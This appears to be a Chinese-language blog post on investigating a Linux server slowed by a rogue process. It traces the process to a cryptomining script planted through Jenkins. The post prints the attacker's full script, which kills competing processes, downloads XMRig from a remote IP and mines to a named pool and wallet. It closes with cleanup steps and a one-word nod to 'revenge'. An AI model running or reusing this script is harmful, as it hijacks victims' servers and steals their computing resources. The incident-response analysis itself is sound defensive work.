linux异常进程问题排查

194 阅读2分钟

linux异常进程问题排查

  1. 有反馈网站访问缓慢,发现有进程占用大量资源

    PID USER      PR  NI    VIRT    RES    SHR S  %CPU %MEM     TIME+ COMMAND                                                                                                                                                
    29575 root      10 -10 2951860   2.0g   1960 S 183.4 26.7  10943:12 trace
    
  2. 查找消耗资源的进程

    指令:ps -f -p 29575

    结果:

    [root@localhost ~]# ps -f -p 29575
    UID        PID  PPID  C STIME TTY          TIME CMD
    root     29575 29554 99 1124 ?      7-12:44:20 ./trace -r 2 -R 2 --keepalive --no-color --donate-level 1 --max-cpu-usage 100 --cpu-priority 3 --print-time 25 --threads 2 --url auto.c3pool.org:13333 --user 83dxgsjgbnM
    

    看到这个配置就知道它不是好东西 --max-cpu-usage 100

  3. 查找父进程 ps -f -p 29554

    [root@localhost ~]# ps -f -p 29554
    UID        PID  PPID  C STIME TTY          TIME CMD
    root     29554 32494  0 1124 ?      00:00:00 /bin/bash /tmp/jenkins1137544342535481679.sh
    [root@localhost ~]# ps -f -p 32494
    UID        PID  PPID  C STIME TTY          TIME CMD
    root     32494     1  0 1124 ?      00:19:04 java -jar /usr/local/jenkins.war --httpPort=8083
    
  4. 了解脚本

    1. cat /tmp/jenkins1137544342535481679.sh

      #!/bin/bash
      
      ps aux | grep -v grep | grep -v "java\|redis\|weblogic\|mongod\|mysql\|oracle\|b52e75408\|tomcat\|grep\|postgres\|confluence\|awk\|aux\|sh"| awk "{if($3>60.0) print $2}" | xargs -I % kill -9 %
      
      if [[ $(whoami) != "root" ]]; then
          for tr in $(ps -U $(whoami) | egrep -v "java|ps|sh|egrep|grep|PID" | cut -b1-6); do
              kill -9 $tr || : ;
          done;
      fi
      
      threadCount=$(lscpu | grep 'CPU(s)' | grep -v ',' | awk '{print $2}' | head -n 1);
      hostHash=$(hostname -f | md5sum | cut -c1-8);
      echo "${hostHash} - ${threadCount}";
      
      _curl () {
        read proto server path <<<$(echo ${1//// })
        DOC=/${path// //}
        HOST=${server//:*}
        PORT=${server//*:}
        [[ x"${HOST}" == x"${PORT}" ]] && PORT=80
      
        exec 3<>/dev/tcp/${HOST}/$PORT
        echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >&3
        (while read line; do
         [[ "$line" == $'\r' ]] && break
        done && cat) <&3
        exec 3>&-
      }
      
      rm -rf config.json;
      
      d () {
            curl -L --insecure --connect-timeout 5 --max-time 40 --fail $1 -o $2 2> /dev/null || wget --no-check-certificate --timeout 40 --tries 1 $1 -O $2 2> /dev/null || _curl $1 > $2;
      }
      
      test ! -s trace && \
          d http://118.189.172.141:8080/novoCRM/static/xmrig-6.4.0-linux-x64.tar.gz trace.tgz && \
          tar -zxvf trace.tgz && \
          mv xmrig-6.4.0/xmrig trace && \
          rm -rf xmrig-6.4.0 && \
          rm -rf trace.tgz;
      
      test ! -x trace && chmod +x trace;
      
      k() {
          ./trace \
              -r 2 \
              -R 2 \
              --keepalive \
              --no-color \
              --donate-level 1 \
              --max-cpu-usage 100 \
              --cpu-priority 3 \
              --print-time 25 \
              --threads ${threadCount:-4} \
              --url $1 \
              --user 83dxgsjgbnMN7Ej6GfCZMsfHYD3NYdozAhm7DjyTme6jTYPaJ8AQeEyMGKLRL1LjqXVSVBJgU3moYUECZjWUAkTi8rxSNZW \
              --pass elf2 \
              --keepalive
      }
      
      k auto.c3pool.org:13333
      
    2. 脚本中有一个trace命令是核心,它是消耗服务器资源的罪魁祸首,通过lsof -p 29554找到它所在目录

      /root/.jenkins/workspace/UpdateJenkins

  5. 处理方案:

    1. 停止该进程,删除问题脚本/tmp/jenkins1137544342535481679.sh
    2. 重新从官方下载jenkins.war
    3. 持续跟踪
    4. revenge